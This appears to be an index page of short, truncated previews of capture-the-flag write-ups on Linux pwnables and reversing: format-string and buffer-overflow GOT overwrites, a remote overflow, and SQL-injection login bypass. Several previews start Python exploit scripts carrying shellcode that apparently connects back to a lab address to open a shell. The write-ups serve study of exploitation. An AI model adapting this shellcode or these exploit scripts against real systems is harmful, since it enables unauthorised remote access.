Category : Pwnables NULL Summary : Format String Vulnerability on Ubuntu , overwrite puts@got Server Info. user20280@ubuntu:~$ uname -a Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux 서버 환경은 Ubuntu 이지만 ASLR이 disable된상태이다. 주어진 파일은 flag user에 setgid가 걸린 bin3 과 bin3의 c 소스파일인 challenge3.c이다. challeng3.c #include #include #include inline int ad..
CTF
Category : Pwnables NULL Summary : simple buffer overflow on Ubuntu , got overwriting with sprintf Server info user20280@ubuntu:~$ uname -a Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux 서버 환경은 Ubuntu 이지만 ASLR이 disable된상태이다. 주어진 파일은 flag user에 setgid가 걸린 bin1 뿐이다. Hex-Ray를 이용해 디컴파일하여 분석할 수 있다. void main(int argc, char **argv) { if ( argc == ..
Category : Pwnables * file Summary : simple remote buffer overflow Binary Info. [pwn3r@localhost rr200]$ file rr200 rr200: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped main함수에서는 daemonize를 시킨뒤 접속하는 client에게 client_callback함수를 실행시켜준다.(함수명은 임의로 지칭한것이다.) 우선 서버에 접속해본다. [pwn3r@localhost rr200]$ nc 192.168.123.134 9999 Hans Brix? Oh no! ..
Category : Revering * file Summary : bypass authentication on ELF binary by sql injection Binary info. [retro300@localhost ~]$ file retro300 retro300: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped [retro300@localhost ~]$ file auth.db auth.db: SQLite 3.x database int main() { int sock_fd; sock_fd = sock_init(word..
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 9999 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 1127 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
Category : Pwnables * file Summary : overwring max length of recving data exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 3555 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\..
Category : Coding , Reverse engineering * binary Summary : generate serial [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZsIdTLcuTNYdJXa pwn3r Invalid router. Routing failed :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZxBSKUqrwwYqezO pwn3r Time out :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 KOkIhGSyESyOWfW aaaaaaaaaaaaaaa WAN ssl Your key is wrong :( exploit.py #!/usr/bin/python from socket impor..
